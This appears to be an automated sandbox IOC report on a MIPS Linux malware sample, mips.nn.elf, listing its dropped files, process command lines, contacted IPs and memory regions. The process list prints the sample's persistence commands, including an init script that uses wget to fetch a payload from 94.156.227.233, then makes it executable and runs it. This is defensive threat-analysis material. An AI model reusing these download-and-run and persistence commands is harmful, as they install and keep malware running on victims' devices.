IOC Report
mips.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
mips.nn.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/mips.nn.elf
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/run/user/127/dconf/user
very short file (no magic)
dropped
/tmp/qemu-open.uYbuZQ (deleted)
ASCII text, with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/mips.nn.elf
/tmp/mips.nn.elf
/tmp/mips.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/mips.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mips.nn.elf
/tmp/mips.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
/tmp/mips.nn.elf
-
/tmp/mips.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
/usr/sbin/gdm3
-
/etc/gdm3/PrimeOff/Default
/etc/gdm3/PrimeOff/Default
There are 34 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

IPs

IP
Domain
Country
Malicious
94.156.227.234
unknown
Bulgaria
malicious
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7ff65c41d000
page execute read
malicious
7ff6e2a4a000
page read and write
56099c9d6000
page read and write
7ff6e2a27000
page read and write
7ff6e2a67000
page read and write
56099c9bf000
page execute and read and write
56099a9c1000
page read and write
7ff6dc021000
page read and write
7ffce31c4000
page read and write
7ff65c45e000
page read and write
7ff6e2f79000
page read and write
7ff6e30a2000
page read and write
7ff6e1bc0000
page read and write
7ff6e2686000
page read and write
56099a9b7000
page read and write
56099e824000
page read and write
7ff6e2d98000
page read and write
7ff6e30ef000
page read and write
56099a72f000
page execute read
7ff6dc000000
page read and write
7ff6e30aa000
page read and write
7ff6e23c8000
page read and write
7ff65c463000
page read and write
7ffce31f2000
page execute read
7ff6e23d6000
page read and write
There are 15 hidden memdumps, click here to show them.